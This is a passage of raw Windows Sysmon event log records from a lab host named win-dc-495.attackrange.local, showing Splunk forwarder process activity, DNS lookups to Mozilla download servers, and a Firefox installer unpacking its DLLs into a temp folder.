Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.130{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.882{59A5CD1D-944E-6005-2205-00000000A301}6120download-installer.cdn.mozilla.net0type: 5 dn6m9t4qll5h.cloudfront.net;::ffff:13.224.189.56;C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 22542200x800000000000000013924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.500{59A5CD1D-944E-6005-2205-00000000A301}6120download.mozilla.org0type: 5 bouncer-bouncer-elb.prod.mozaws.net;::ffff:18.205.79.132;::ffff:100.24.193.114;::ffff:3.94.27.216;C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 22542200x800000000000000013923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:42.858{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 11241100x800000000000000014020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.536{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\xul.dll2021-01-18 13:59:46.536 11241100x800000000000000014019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.521{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\vcruntime140.dll2021-01-18 13:59:46.521 11241100x800000000000000014018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.490{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\ucrtbase.dll2021-01-18 13:59:46.490 11241100x800000000000000014017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.490{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\softokn3.dll2021-01-18 13:59:46.490 11241100x800000000000000014016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.490{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\qipcap64.dll2021-01-18 13:59:46.490 11241100x800000000000000014015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.474{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\osclientcerts.dll2021-01-18 13:59:46.474 11241100x800000000000000014014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.474{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\nssckbi.dll2021-01-18 13:59:46.474 11241100x800000000000000014013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.396{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\nss3.dll2021-01-18 13:59:46.396 11241100x800000000000000014012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.380{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\msvcp140.dll2021-01-18 13:59:46.380 11241100x800000000000000014011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.365{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\mozglue.dll2021-01-18 13:59:46.365 11241100x800000000000000014010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.349{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\mozavutil.dll2021-01-18 13:59:46.349 11241100x800000000000000014009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.302{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\mozavcodec.dll2021-01-18 13:59:46.302 11241100x800000000000000014008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\libGLESv2.dll2021-01-18 13:59:46.208 11241100x800000000000000014007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\libEGL.dll2021-01-18 13:59:46.208 11241100x800000000000000014006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\lgpllibs.dll2021-01-18 13:59:46.208 11241100x800000000000000014005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.208{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\IA2Marshal.dll2021-01-18 13:59:46.208 11241100x800000000000000014004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.193{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\freebl3.dll2021-01-18 13:59:46.193 10341000x800000000000000014003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:46.193{59A5CD1D-9452-6005-2605-00000000A301}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000013995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.068{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\d3dcompiler_47.dll2021-01-18 13:59:46.068 11241100x800000000000000013994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.068{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\gmp-clearkey\0.1\clearkey.dll2021-01-18 13:59:46.068 11241100x800000000000000013993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-utility-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-time-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-string-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-stdio-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-runtime-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-process-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-private-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-multibyte-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-math-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-locale-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-heap-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-filesystem-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-environment-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-convert-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-crt-conio-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-timezone-l1-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-synch-l1-2-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-processthreads-l1-1-1.dll2021-01-18 13:59:46.052 11241100x800000000000000013975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-localization-l1-2-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-file-l2-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-file-l1-2-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\AccessibleMarshal.dll2021-01-18 13:59:46.052 11241100x800000000000000013971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.036{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\AccessibleHandler.dll2021-01-18 13:59:46.036 11241100x800000000000000013970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.036{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\updater.exe2021-01-18 13:59:46.036 11241100x800000000000000013969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 